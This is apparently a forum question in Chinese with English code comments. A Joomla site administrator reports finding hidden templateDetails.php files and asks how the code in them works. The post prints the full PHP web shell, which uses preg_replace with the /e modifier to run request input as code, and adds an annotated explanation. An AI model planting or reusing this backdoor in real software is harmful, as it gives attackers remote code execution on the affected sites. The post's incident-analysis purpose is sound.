我刚刚在Joomla安装的网站上发现,我正在管理隐藏在各种文件夹中的许多templateDetails.php文件,代码如下:
<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>
我及时恢复了网站备份,更改了所有管理员密码,并加强了网站的安全性。
你能解释一下这种代码是如何被用来窃取或破坏网站的吗?
我对下面的代码进行了注释,供您解释:
<?php
//Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
header("HTTP/1.0 404 Not Found"); //If that variable doesn't exist, send a 404
// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and then in theory use the result as the preg_replace (however in this case, that bit doesn't matter, as actually all we are looking to do is evecute whatever has been passed through request - basically doing eval(), but hiding it so it's not as obvious, and won't get picked up (in theory) by any installs that block eval (although in practise most then also stop the e flag from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>
在排序中,使用eval()是一种奇特的方式,允许它们将任何代码作为查询字符串传递,然后执行它!